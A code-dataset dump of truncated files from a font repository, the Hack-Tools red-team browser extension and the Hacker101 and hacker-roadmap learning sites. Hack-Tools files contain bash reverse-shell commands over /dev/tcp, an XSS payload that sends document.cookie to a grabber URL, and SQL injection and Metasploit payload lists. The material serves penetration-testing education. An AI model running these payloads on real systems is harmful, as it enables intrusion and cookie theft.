language
stringlengths
0
24
filename
stringlengths
9
214
code
stringlengths
99
9.93M
Hack/source/Hack-Regular.ufo/lib.plist
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>public.glyphOrder</key> <array> <string>.notdef</string> <string>NULL</string> <string>CR</string> <string>space</string> <string>Ac...
Hack/source/Hack-Regular.ufo/metainfo.plist
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>creator</key> <string>com.schriftgestaltung.GlyphsUFOExport</string> <key>formatVersion</key> <integer>2</integer> </dict> </plist>
Hack/source/Hack-Regular.ufo/glyphs/contents.plist
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>.notdef</key> <string>_notdef.glif</string> <key>A</key> <string>A_.glif</string> <key>AE</key> <string>A_E_.glif</string> <key>...
Hack/source/subset-lib/lib-bold.plist
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>com.schriftgestaltung.Keep Glyphs</key> <array> <string>.notdef</string> <string>NULL</string> <string>CR</string> <string>space</stri...
Hack/source/subset-lib/lib-bolditalic.plist
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>com.schriftgestaltung.Keep Glyphs</key> <array> <string>.notdef</string> <string>NULL</string> <string>CR</string> <string>space</stri...
Hack/source/subset-lib/lib-italic.plist
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>com.schriftgestaltung.Keep Glyphs</key> <array> <string>.notdef</string> <string>NULL</string> <string>CR</string> <string>space</stri...
Hack/source/subset-lib/lib-regular.plist
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>com.schriftgestaltung.Keep Glyphs</key> <array> <string>.notdef</string> <string>NULL</string> <string>CR</string> <string>space</stri...
Python
Hack/tools/scripts/checksum/checksum.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- #---------------------------------------------------------------------------------------------------------- # checksum.py # A SHA1 hash checksum list generator for fonts and fontTools # XML dumps of font OpenType table data + checksum testing # script # # Copyright 201...
Shell Script
Hack/tools/scripts/css/css-build.sh
#!/bin/sh ####################################### # Copyright 2018 Christopher Simpkins # MIT License ####################################### # This script builds the Hack web font CSS files from CSS file templates # by adding a git commit sha1 stamp to the URL string # Dependency: # Ink - https://github.com/chris...
Shell Script
Hack/tools/scripts/diff/ttdiff.sh
#!/bin/bash # Copyright 2018 Source Foundry Authors # MIT License # compare fonts with ttx ttdiff () { if [ "$#" -lt 2 ] then echo "Usage: ttdiff FONT1.ttf FONT2.ttf [tables ...]" return 1 fi first="$1" if [ ! -f "$first" ]; then echo "File $first not found" return ...
Shell Script
Hack/tools/scripts/install/ttfautohint-build.sh
#!/bin/sh # shellcheck disable=SC2103 # This script builds a stand-alone binary for the command line version of # ttfautohint, downloading any necessary libraries. # # Version 2018-Feb-22. # The MIT License (MIT) # Copyright (c) 2018 Werner Lemberg # Permission is hereby granted, free of charge, to any person obtain...
Hack-Tools/.babelrc
{ "presets": [ [ "@babel/preset-env", { "modules": false } ], "@babel/preset-react" ], "plugins": [ "react-hot-loader/babel" ] }
Hack-Tools/.gitignore
/.git /node_modules /dist .DS_Store yarn.lock package-lock.json yarn-error.log .scannerwork .vscode .idea .github pnpm-lock.yaml bundle*.zip
JSON
Hack-Tools/package.json
{ "name": "hack-tools", "version": "1.0.0", "description": "The all in one Red team browser extension for web pentesters", "main": "index.js", "scripts": { "start": "webpack --watch", "build": "webpack --mode production && rm -f ./dist/*.map", "watch": "webpack --watch", ...
JSON
Hack-Tools/tsconfig.json
{ "compilerOptions": { "jsx": "react", "module": "commonjs", "allowSyntheticDefaultImports": true, "noImplicitAny": false, "outDir": "./dist/", "preserveConstEnums": true, "removeComments": true, "esModuleInterop": true, "baseUrl": "src", "sourceMap": true, "moduleResolutio...
JavaScript
Hack-Tools/webpack.config.js
const webpack = require('webpack'); const path = require('path'); const HtmlWebpackPlugin = require('html-webpack-plugin'); const { CleanWebpackPlugin } = require('clean-webpack-plugin'); const CopyWebpackPlugin = require('copy-webpack-plugin'); const ReactRefreshWebpackPlugin = require('@pmmmwh/react-refresh-webpack-p...
Hack-Tools/src/App.tsx
import React from 'react'; import ReactDOM from 'react-dom'; import { Router } from 'react-chrome-extension-router'; import { FloatButton } from 'antd'; import { QueryClientProvider, QueryClient } from 'react-query'; import LayoutApp from './components/LayoutApp'; import ReverseShell from './components/linux/ReverseShe...
HTML
Hack-Tools/src/index.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <title>Hack-Tools</title> </head> <body> <div id="app"></div> </body> </html>
JSON
Hack-Tools/src/manifest.json
{ "name": "Hack-Tools", "version": "0.5.0", "description": "The all in one Red team extension for web pentester", "action": { "default_title": "Hack-Tools", "default_popup": "index.html", "default_icon": { "16": "./src/assets/img/icons/get_started16.png", ...
Hack-Tools/src/assets/css/style.css
.logo:hover { cursor: pointer; animation: jelly 0.5s; } .logo { padding-left: 17px; padding-top: 14px; margin-bottom: 10px; } @keyframes jelly { 0%, 100% { transform: scale(1, 1); } 25% { transform: scale(0.9, 1.1); } 50% { transform: scale(1.1, 0...
JSON
Hack-Tools/src/assets/data/Encoder.json
[ { "value": "cmd/echo" }, { "value": "cmd/generic_sh" }, { "value": "cmd/ifs" }, { "value": "cmd/perl" }, { "value": "cmd/powershell_base64" }, { "value": "cmd/printf_php_mq" }, { "value": "generic/eicar" }, { "value": "generic/none" }, { "value": "mipsbe/byte_xori" }, { "value": "mipsbe/longxor" }, { "valu...
JSON
Hack-Tools/src/assets/data/Format.json
[ { "value": "asp" }, { "value": "aspx" }, { "value": "aspx-exe" }, { "value": "axis2" }, { "value": "bash" }, { "value": "c" }, { "value": "csharp" }, { "value": "dll" }, { "value": "dw" }, { "value": "dword" }, { "value": "elf" }, { "value": "elf-so" }, { "value": "exe" }, { "value": "exe-only" }, { "v...
JSON
Hack-Tools/src/assets/data/Payloads.json
[ { "value": "aix/ppc/shell_bind_tcp" }, { "value": "aix/ppc/shell_find_port" }, { "value": "aix/ppc/shell_interact" }, { "value": "aix/ppc/shell_reverse_tcp" }, { "value": "android/meterpreter/reverse_http" }, { "value": "android/meterpreter/reverse_https" }, { "value": "android/meterpreter/reverse_tcp" }, { "...
JSON
Hack-Tools/src/assets/data/Platform.json
[ { "value": "aix" }, { "value": "android" }, { "value": "apple_ios" }, { "value": "bsd" }, { "value": "bsdi" }, { "value": "cisco" }, { "value": "firefox" }, { "value": "freebsd" }, { "value": "hardware" }, { "value": "hpux" }, { "value": "irix" }, { "value": "java" }, { "value": "javascript" }, { "value...
JSON
Hack-Tools/src/assets/data/RevShell.json
[ { "name": "Bash -i", "command": "{shell} -i >& /dev/tcp/${values.ip}/${values.port} 0>&1", "tags": [ "linux", "mac" ] }, { "name": "Bash 196", "command": "0<&196;exec 196<>/dev/tcp/${values.ip}/${values.port}; {shell} <&196 >&196 2>&1...
JavaScript
Hack-Tools/src/assets/img/icons/iconfont.js
!function(t){var c,l,h,a,o,v='<svg><symbol id="icon-Encode-File" viewBox="0 0 1024 1024"><path d="M409.6 853.333333H34.133333c-10.24 0-17.066667-6.826667-17.066666-17.066666v-546.133334c0-3.413333 3.413333-10.24 3.413333-13.653333l273.066667-273.066667c3.413333 0 10.24-3.413333 13.653333-3.413333h273.066667c10.24 0 17....
Hack-Tools/src/components/AboutUs.tsx
import React from 'react'; import { Typography, Divider } from 'antd'; const { Title, Paragraph, Link } = Typography; export default function AboutUs () { return ( <div> <Title level={2} style={{ fontWeight: 'bold', margin...
Hack-Tools/src/components/LayoutApp.tsx
import React, { useEffect } from 'react'; import { Layout, Menu, Typography, theme, Button, Select, ConfigProvider, Switch } from 'antd'; import { CopyrightCircleOutlined, FullscreenOutlined, ArrowsAltOutlined } from '@ant-design/icons'; import { createFromIconfontCN } from '@ant-design/icons'; import { goTo } from 're...
Hack-Tools/src/components/encoding/DataEncoding.tsx
import React, { useState } from 'react'; import { Button, Input, Typography, message, Divider, Menu, Dropdown } from 'antd'; import { CopyOutlined, createFromIconfontCN, ClearOutlined, DownOutlined } from '@ant-design/icons'; import Clipboard from 'react-clipboard.js'; import escape_quotes from 'escape-quotes'; const ...
Hack-Tools/src/components/encoding/Hashing.tsx
import React, { useState } from 'react'; import { Button, Input, Typography, Menu, Dropdown, Divider, message } from 'antd'; import { CopyOutlined, DownOutlined, ArrowsAltOutlined, createFromIconfontCN } from '@ant-design/icons'; import MD5 from 'crypto-js/md5'; import SHA1 from 'crypto-js/sha1'; import SHA256 from 'cr...
Hack-Tools/src/components/encoding/HexEncode.tsx
import React, { useState } from 'react'; import { Button, Input, Typography, message, Divider } from 'antd'; import { CopyOutlined, createFromIconfontCN, ClearOutlined } from '@ant-design/icons'; import Clipboard from 'react-clipboard.js'; const { Title, Paragraph } = Typography; const IconFont = createFromIconfontCN(...
Hack-Tools/src/components/encoding/URLEncode.tsx
import React, { useState } from 'react'; import { Button, Input, Typography, message, Divider } from 'antd'; import { CopyOutlined, createFromIconfontCN, ClearOutlined } from '@ant-design/icons'; import Clipboard from 'react-clipboard.js'; import { escape, unescape } from 'querystring'; const { Title, Paragraph } = Ty...
Hack-Tools/src/components/file_transfer/File_transfer.tsx
import React from 'react'; import PersistedState from 'use-persisted-state'; import { Typography, Row, Col, Divider, Input, Space } from 'antd'; import { WifiOutlined, createFromIconfontCN, FolderOutlined, FileDoneOutlined } from '@ant-design/icons'; import { Ipv4TcpCacheState } from "components/types/Ipv4TcpCacheState...
Hack-Tools/src/components/file_transfer/ObfuscatedFiles.tsx
import React, { useState } from 'react'; import PersistedState from 'use-persisted-state'; import { Button, Input, Typography, message, Divider, Menu, Dropdown, Space } from 'antd'; import { CopyOutlined, createFromIconfontCN, ClearOutlined, DownOutlined, FileTextOutlined } from '@ant-design/icons'; import { Obfuscated...
Hack-Tools/src/components/http_utils/HTTP-Utils.tsx
import React, { useState } from 'react'; import { Button, Typography, Row, Col, Input, Select, Divider, Tag, message, Descriptions, Modal, Tabs, Alert } from 'antd'; import { SendOutlined, FullscreenOutlined, ArrowsAltOutlined, DeleteOutlined } from '@ant-design/icons...
Hack-Tools/src/components/linux/LinuxCommands.tsx
import React from 'react'; import { Typography, Divider, Button, Collapse } from 'antd'; import { ArrowsAltOutlined } from '@ant-design/icons'; const { Title, Paragraph, Text } = Typography; const { Panel } = Collapse; export default function LinuxCommands () { const Suid = [ { title: 'find / -user root -...
Hack-Tools/src/components/linux/MSFBuilder.tsx
import React from 'react'; import { Input, Typography, Row, Divider, Select, Form, Col, Collapse } from 'antd'; import PersistedState from 'use-persisted-state'; import { MSFBuilder } from 'components/types/MSFBuilder'; const { Title, Paragraph } = Typography; const MSFBuilder = () => { // LocalStorage stuff ...
Hack-Tools/src/components/linux/PowershellCommands.tsx
import React from 'react'; import { Typography, Divider, Button, message } from 'antd'; import SyntaxHighlighter from 'react-syntax-highlighter'; import { vs2015 } from 'react-syntax-highlighter/dist/esm/styles/hljs'; import Clipboard from 'react-clipboard.js'; import { CopyOutlined } from '@ant-design/icons'; const {...
Hack-Tools/src/components/linux/ReverseShell.tsx
import React, { useRef, useState } from 'react'; import { message, Typography, Row, Col, Input, Table, Tag, Select, Form, InputRef, Button, Space, Dropdown } from 'antd'; import type { ColumnsType, TableProps } from 'antd/es/table'; import { SearchOutlined, WifiOutlined, createFromIconfontCN } from '@ant-design/icons';...
Hack-Tools/src/components/linux/TtySpawnShell.tsx
import React from 'react'; import { Typography, Divider, Space } from 'antd'; const { Title, Paragraph, Text } = Typography; export default function TTY () { return ( <div> <Title level={2} style={{ fontWeight: 'bold', margin: 15 }}> TTY Spawn Shell </Title> ...
Hack-Tools/src/components/notepad/Notepad.tsx
import React from 'react'; import MDEditor from '@uiw/react-md-editor'; import PersistedState from 'use-persisted-state'; const NOTEPAD = () => { const [ value, setValue ] = PersistedState<string | string>( 'notepad' )( '' ); return ( <div className='container'> <MDEditor t...
Hack-Tools/src/components/rss/BugsCX.tsx
import React from 'react'; import { Typography, Empty, Spin, Button, List, Tag } from 'antd'; import { PageHeader } from '@ant-design/pro-layout'; import { goTo } from 'react-chrome-extension-router'; import { useQuery } from 'react-query'; import CxsecurityChoose from './CxsecurityChoose'; const { Title } = Typograph...
Hack-Tools/src/components/rss/Cisco.tsx
import React from 'react'; import { Typography, Empty, Spin, Button, List, Tag } from 'antd'; import { PageHeader } from '@ant-design/pro-layout'; import { goTo } from 'react-chrome-extension-router'; import { useQuery } from 'react-query'; import FeedRSS from './FeedRSS'; const { Title } = Typography; const fetchApi...
Hack-Tools/src/components/rss/CVESearch.tsx
import React, { useState } from 'react'; import { Typography, Empty, Spin, Button, Tag, Descriptions, Input, List, Divider, Result } from 'antd'; import { PageHeader } from '@ant-design/pro-layout'; import { CloseCircleOutlined } from '@ant-design/icons'; import { goTo } from 'react-chrome-extension-router'; import { u...
Hack-Tools/src/components/rss/CxsecurityChoose.tsx
import React from 'react'; import { Typography, Card, Col, Row, Button } from 'antd'; import { PageHeader } from '@ant-design/pro-layout'; import { goTo } from 'react-chrome-extension-router'; import { GithubOutlined } from '@ant-design/icons'; import FeedRSS from './FeedRSS'; import ExploitCX from './ExploitCX'; impor...
Hack-Tools/src/components/rss/DorksCX.tsx
import React from 'react'; import { Typography, Empty, Spin, Button, List, Tag } from 'antd'; import { PageHeader } from '@ant-design/pro-layout'; import { goTo } from 'react-chrome-extension-router'; import { useQuery } from 'react-query'; import CxsecurityChoose from './CxsecurityChoose'; const { Title } = Typograph...
Hack-Tools/src/components/rss/ExploitCX.tsx
import React from 'react'; import { Typography, Empty, Spin, Button, List, Tag } from 'antd'; import { PageHeader } from '@ant-design/pro-layout'; import { goTo } from 'react-chrome-extension-router'; import { useQuery } from 'react-query'; import CxsecurityChoose from './CxsecurityChoose'; const { Title } = Typograph...
Hack-Tools/src/components/rss/ExploitDB.tsx
import React from 'react'; import { Typography, Empty, Spin, Button, List, Tag } from 'antd'; import { PageHeader } from '@ant-design/pro-layout'; import { goTo } from 'react-chrome-extension-router'; import { useQuery } from 'react-query'; import FeedRSS from './FeedRSS'; const { Title } = Typography; const fetchApi...
Hack-Tools/src/components/rss/FeedRSS.tsx
import React from 'react'; import { Typography, Card, Col, Row, Avatar, Tooltip, Button } from 'antd'; import { goTo } from 'react-chrome-extension-router'; import { LinkOutlined, EyeOutlined, GithubOutlined } from '@ant-design/icons'; import ExploitDB from './ExploitDB'; import Cisco from './Cisco'; import cve from '....
Hack-Tools/src/components/types/Ipv4TcpCacheState.ts
export type Ipv4TcpCacheState = { ip: string | number; port: string | number; output_file_name?: string | number; target_file_name?: string | number; shell?: string | number; };
Hack-Tools/src/components/types/MSFBuilder.ts
export type MSFBuilder = { Payload: string; LHOST: string; LPORT: string; Encoder: string; EncoderIterations: string; Platform: string; Arch: string; NOP: string; BadCharacters: string; Format: string; Outfile: string; };
Hack-Tools/src/components/web/LFI.tsx
import React from 'react'; import { Button, message, Typography, Divider } from 'antd'; import { CopyOutlined, LinkOutlined } from '@ant-design/icons'; import Clipboard from 'react-clipboard.js'; const { Title, Paragraph, Text } = Typography; export default function LFI () { const successInfoReverseShell = () => ...
Hack-Tools/src/components/web/PhpReverseShell.tsx
import React from 'react'; import PersistedState from 'use-persisted-state'; import { Input, Button, message, Typography, Row, Col, Divider, Collapse } from 'antd'; import { CopyOutlined, WifiOutlined, DownloadOutlined, ArrowsAltOutlined, createFromIconfontCN } from '@ant-design/icons'; import Clipb...
Hack-Tools/src/components/web/SqlInjection.tsx
import React from 'react'; import { Typography, Divider } from 'antd'; const { Title, Paragraph, Text, Link } = Typography; export default function SQLi () { const DbColumnNumber = [ { db_type: 'MySQL/MSSQL/PGSQL', title: "'UNION SELECT NULL,NULL,NULL -- -" }, { ...
Hack-Tools/src/components/web/XSS.tsx
import React from 'react'; import { Typography, Divider } from 'antd'; const { Title, Paragraph, Text } = Typography; export default function XSS () { const DataGrabber = [ { title: "<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>" }, { ...
JavaScript
Hack-Tools/src/devtools/devtools.js
navigator.userAgent.indexOf('Firefox') != -1 && browser.devtools.panels.create('HackTools', 'get_started16.png', 'index.html'); navigator.userAgent.indexOf('Chrome') != -1 && chrome.devtools.panels.create( 'HackTools', // title for the panel tab null, // path to an icon 'index.html', // html page which is go...
Markdown
hacker-roadmap/CONTRIBUTING.md
# Contributing Before contributing or comment, please note that I am not a professional infosec or pen tester. I am just a student who want to learn and teach to others. Other contributors might be students as well, so be patient and indulgent with everyone. Do not forget that the main goal here is to write about ethi...
hacker-roadmap/LICENSE
MIT License Copyright (c) 2018 Raphael Cerveaux Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, ...
Markdown
hacker-roadmap/PULL_REQUEST_TEMPLATE.md
**Content Update :** Yes|No **Related Content :** Guide|Tools *Explain your changes here. Please read CONTRIBUTING.md before creating pull requests.*
Markdown
hacker-roadmap/README.md
<p align="center"> <img src="https://i.imgur.com/VeEYEkT.png" alt="Hacker roadmap" /><br> </p> This repository is an overview of what you need to learn penetration testing and a collection of hacking tools, resources and references to practice ethical hacking. Most of the tools are UNIX compatible, free and open s...
Markdown
hacker-roadmap/.github/ISSUE_TEMPLATE/improvement-request.md
--- name: Improvement request about: Suggest an idea for this project title: '' labels: '' assignees: '' --- (Please read CONTRIBUTING.md before posting issues) **Is your feature request related to a problem? Please describe.** A clear and concise description of what the problem is. **Describe the solution you'd li...
Markdown
hacker-roadmap/.github/ISSUE_TEMPLATE/submit-a-general-issue.md
--- name: Submit a general issue about: Default template title: '' labels: '' assignees: '' --- **Related content :** Guide|Tools **Issue with the content :** Yes|No *Your comments here. Please read CONTRIBUTING.md before posting issues.*
HTML
hacker101/404.html
--- layout: default --- <div class="d-flex h-100 align-items-center"> <div class="container text-center"> <h1>404</h1> <p><strong>Page not found :(</strong></p> <p>The requested page could not be found.</p> </div> </div>
Markdown
hacker101/announcements.md
--- layout: page title: Announcements --- # Hacky Holidays 2021! ![Grinsh Networks](./assets/grinch.png) The Grinch has gone hi-tech this year with the intentions of ruining the holidays and we need you to infiltrate his network and take him down! For the next twelve days, starting at 12pm PT on Friday, December 1...
HTML
hacker101/discord.html
<meta http-equiv="refresh" content="0; URL='https://discord.gg/32ZNZVN'" /> Redirecting to Discord. If you're not automatically redirected, <a href="https://discord.gg/32ZNZVN">click here</a>.
Markdown
hacker101/index.md
--- layout: default title: Home --- <div class="container"> <div class="row"> <div class="col-md-6 py-4 align-self-center"> <h1> LEARN TO HACK </h1> <p class="lead my-3"> Hacker101 is a free class for web security. Whether you&#8217;re a programmer with an interest in bu...
hacker101/LICENSE
Copyright © 2020 HackerOne Inc. This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License: Attribution-NonCommercial-ShareAlike 4.0 International ======================================================================= Creative Commons Corporation ("Creative Commons...
Markdown
hacker101/README.md
# Hacker101 [Hacker101](https://www.hacker101.com/) is a free class for web security. Whether you're a programmer with an interest in bug bounties or a seasoned security professional, Hacker101 has something to teach you. ## Getting Started ### Prerequisites - Ruby - Suggestion: use [`rbenv`](https://github.com/r...
Markdown
hacker101/resources.md
--- layout: page title: Resources --- <ul> {% for resource in site.resources %} <li> <a href="/resources#{{ resource.title | url_encode }}">{{ resource.title }}</a> </li> {% endfor %} </ul> --- {% for resource in site.resources %} <h2 id="{{ resource.title | url_encode }}">{{ resource.title }}</h...
Markdown
hacker101/start-here.md
--- layout: page title: Getting Started sidebar: - title: Report Writing, Communication Tips, and Community Guidelines links: - text: "Understanding HackerOne's Code of Conduct" url: /resources/articles/code_of_conduct - text: "How to Write a Good Report and Use the CVSS Calculator" ur...
Shell Script
hacker101/update_bootstrap.sh
#! /bin/sh # A useful script to download the latest version of bootstrap and jquery rm -rf node_modules package-lock.json npm install bootstrap@4 jquery@3 rm -rf _sass/bootstrap mkdir -p _sass/bootstrap cp -r node_modules/bootstrap/scss/* _sass/bootstrap touch _sass/bootstrap/__DO_NOT_MODIFY rm -rf assets/javascrip...
Markdown
hacker101/videos.md
--- layout: page title: Video Lessons sidebar: - title: "Learning Tracks" links: - text: "Hacker101 for Newcomers" url: /playlists/newcomers - text: "Burp Suite" url: /playlists/burp_suite - text: "Pentest Series" url: /playlists/pentesting_series - text: "Web Hacki...
YAML
hacker101/_config.yml
title: Hacker101 email: support@hackerone.com description: >- Hacker101 is a free class for web security. Whether you're a programmer with an interest in bug bounties or a seasoned security professional, Hacker101 has something to teach you. author: name: HackerOne twitter: Hacker0x01 google_analytics: UA-499...
hacker101/assets/.DS_Store
Bud1 ocblob...
Sass
hacker101/assets/css/main.scss
--- # Only the main Sass file needs front matter (the dashes are enough) --- @import "bootstrap/functions"; @import "variables"; @import "bootstrap/bootstrap"; @import "syntax-highlighting"; @import "bootstrap-4-jekyll/bootstrap-4-jekyll"; @import "bootstrap_customization";
hacker101/assets/images/.DS_Store
Bud1  clesIloc...
hacker101/assets/images/articles/.DS_Store
Bud1†calc.p CVSScalc.pngIlocblob;(ÿÿÿÿÿÿ...
JavaScript
hacker101/assets/javascript/dark-mode.js
$(document).ready(function() { var darkModeOff = localStorage.getItem('darkModeOff'); var toggleDarkMode = function() { $("#mode-light,#mode-dark").toggleClass("d-none"); $("main.bg-white,main.bg-black,main .bg-white,main .bg-black").toggleClass("bg-black text-light bg-white"); $("main .bg-light,main ...
JavaScript
hacker101/assets/javascript/bootstrap/bootstrap.bundle.min.js
/*! * Bootstrap v4.6.0 (https://getbootstrap.com/) * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */ !function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,requi...
hacker101/assets/javascript/bootstrap/bootstrap.bundle.min.js.map
{"version":3,"sources":["../../js/src/util.js","../../js/src/alert.js","../../js/src/button.js","../../js/src/carousel.js","../../js/src/collapse.js","../../node_modules/popper.js/dist/esm/popper.js","../../js/src/dropdown.js","../../js/src/modal.js","../../js/src/tools/sanitizer.js","../../js/src/tooltip.js","../../js...
JavaScript
hacker101/assets/javascript/bootstrap/jquery.min.js
/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */ !function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undef...
hacker101/assets/javascript/bootstrap/jquery.min.map
{"version":3,"sources":["jquery.js"],"names":["global","factory","module","exports","document","w","Error","window","this","noGlobal","arr","getProto","Object","getPrototypeOf","slice","flat","array","call","concat","apply","push","indexOf","class2type","toString","hasOwn","hasOwnProperty","fnToString","ObjectFunctionS...
Markdown
hacker101/conferences/hacktivitycon2020/0tomvh.md
--- layout: page title: How I got from 0 to MVH video_src: https://www.youtube-nocookie.com/embed/M48hOtExUII --- About the Speaker ----------------- STÖK is a hacker, content creator, and creative with 25 years as a professional in Information Technology. STÖK is not only dedicated to bring excellent content and sha...
Markdown
hacker101/conferences/hacktivitycon2020/beyondscope.md
--- layout: page title: Beyond the Borders of Scope video_src: https://www.youtube-nocookie.com/embed/ZV7Xz8p12fo --- Speaker ----------------- Jr0ch17 has been in the security industry for about 3 years now, mostly working as a pentester while getting industry certifications like OSCP and GWAPT. Since March 2020, he...
Markdown
hacker101/conferences/hacktivitycon2020/burnouts.md
--- layout: page title: How to Deal with Burnouts video_src: https://www.youtube-nocookie.com/embed/I6eUy4XIYrY --- About the Speaker ----------------- Chloe Messdaghi is the VP of Strategy at Point3 Security. She is a security researcher advocate who strongly believes that information security is a humanitarian iss...
Markdown
hacker101/conferences/hacktivitycon2020/carivi.md
--- layout: page title: From an 'IVI in a box' to a 'CAR in a box' video_src: https://www.youtube-nocookie.com/embed/e_7PklFoJe8 --- About the Speaker ----------------- Details of the car hack on my own vehicle in 2017 and then how I 1st created an 'IVI in a box' and then PD0 'Car in a box'. Some hints and tips on h...
Markdown
hacker101/conferences/hacktivitycon2020/codeql.md
--- layout: page title: Discover vulnerabilities with CodeQL video_src: https://www.youtube-nocookie.com/embed/NygVkQKmGwI --- About the Speaker ----------------- Boik Su is currently in CyCraft as a security researcher focusing on web security and threat hunting. He has received some awards from CTFs, been the spea...
Markdown
hacker101/conferences/hacktivitycon2020/exploiting_email_systems.md
--- layout: page title: You've Got Pwned subtitle: Exploiting E-mail Systems video_src: https://www.youtube-nocookie.com/embed/Bpnc1-g3fMk redirect_from: - /conferences/hacktivitycon/exploiting-email-systems --- About the Speaker ----------------- Inti De Ceukelaire is a Belgian ethical hacker and bug bounty hunte...
Markdown
hacker101/conferences/hacktivitycon2020/gitlab.md
--- layout: page title: The journey of finding and exploiting a bug in GitLab video_src: https://www.youtube-nocookie.com/embed/jBPYfN_uuRw --- About the Speaker ----------------- William Bowling (@vakzz) is a full time Software Developer and long time CTF player, based out of Australia, who recently started trying ...
Markdown
hacker101/conferences/hacktivitycon2020/grafanassrf.md
--- layout: page title: Graphing Out Internal Networks with CVE-2020-13379 (Unauthed Grafana SSRF) video_src: https://www.youtube-nocookie.com/embed/NWHOmYbLrZ0 --- About the Speaker ----------------- Justin Gardner is a full-time bug bounty hunter based near Tokyo, Japan. His focus in the security space is on web ...
Markdown
hacker101/conferences/hacktivitycon2020/keynote.md
--- layout: page title: Keynote video_src: https://www.youtube-nocookie.com/embed/F_W3mV-EC9w --- About the Speaker ----------------- Georgia Weidman is a serial entrepreneur, penetration tester, security researcher, speaker, trainer, mentor, and author. Her work in smartphone exploitation received a DARPA Cyber Fa...
Markdown
hacker101/conferences/hacktivitycon2020/offsec_panel.md
--- layout: page title: Breaking Down Offensive Security Certifications video_src: --- Panelists ----------------- - Busra Demir - Andreea Druga - Monika Talekar - Rana Khalil Abstract ----------------- Certifications have become a big part of the infosec industry and they have helped individuals learn about compli...
Markdown
hacker101/conferences/hacktivitycon2020/parse.md
--- layout: page title: The problem with Parse subtitle: A low-code server that endangers over 64,000,000 users video_src: https://www.youtube-nocookie.com/embed/pKjGlo2TkSk --- About the Speaker --- healdb is a 23 year old MS CS student and currently in his last semester at RIT. He has been participating in bug b...
Markdown
hacker101/conferences/hacktivitycon2020/pentester_blueprint.md
--- layout: page title: The Pentester Blueprint subtitle: A Guide to Becoming a Pentester video_src: https://www.youtube-nocookie.com/embed/NPuwI7rd4xg redirect_from: - /conferences/hacktivitycon/pentester-plueprint --- About the Speaker ----------------- Phillip Wylie is the Senior Red Team Lead for a global cons...
Markdown
hacker101/conferences/hacktivitycon2020/penteststories.md
--- layout: page title: Pentest Story Time subtitle: My Favorite Hacks From the Past Year video_src: https://www.youtube-nocookie.com/embed/WOXtXRRp4LI --- About the Speaker ----------------- Heath Adams (aka The Cyber Mentor) is the CEO and founder of TCM Security. Outside of TCM Security, he is an online cybersec...
Markdown
hacker101/conferences/hacktivitycon2020/tbhm.md
--- layout: page title: The Bug Hunter's Methodology v4 subtitle: Recon Edition video_src: https://www.youtube-nocookie.com/embed/qLTe6Z10vj8 --- About the Speaker ----------------- Jason is the Head of Security for a leading videogame production company. Previously he was VP of Trust and Security at Bugcrowd and c...
Markdown
hacker101/conferences/hacktivitycon2020/waf.md
--- layout: page title: WAF Bypass In Depth video_src: https://www.youtube-nocookie.com/embed/zhkCf8tldbk --- About the Speaker ----------------- Robert Chen (@notdeghost) is a 17-year-old CTF player with redpwn, bug hunter, software developer, and full-time high school student. He participates in CTFs and various bu...
Markdown
hacker101/conferences/hacktivitycon2020/web_cache_deception.md
--- layout: page title: Cached and Confused subtitle: Web Cache Deception in the Wild video_src: https://www.youtube-nocookie.com/embed/czDfMWBsIKw redirect_from: - /conferences/hacktivitycon/web-cache-deception --- About the Speaker ----------------- Seyed Ali Mirheidari has over a decade experience of leading pen...
Markdown
hacker101/conferences/hacktivitycon2021/bugbountyfor5years.md
--- layout: page title: Hacking on Bug Bounties for Five Years video_src: https://www.youtube-nocookie.com/embed/iG7-c0YbhbM/ --- About the Speaker ----------------- Shubham Shah is the co-founder and CTO of Assetnote, a platform for continuous monitoring of your external attack surface. Shubham is a prolific bug bou...
Markdown
hacker101/conferences/hacktivitycon2021/ctfdev.md
--- layout: page title: Developing CTFs subtitle: Writing and hosting intentionally vulnerable applications video_src: https://www.youtube-nocookie.com/embed/XZKdS8Vug2o --- About the Speaker ----------------- Matt Ehrnschwender, a CTF player and developer for CTF4Hire. Work with John Hammond and a team of individua...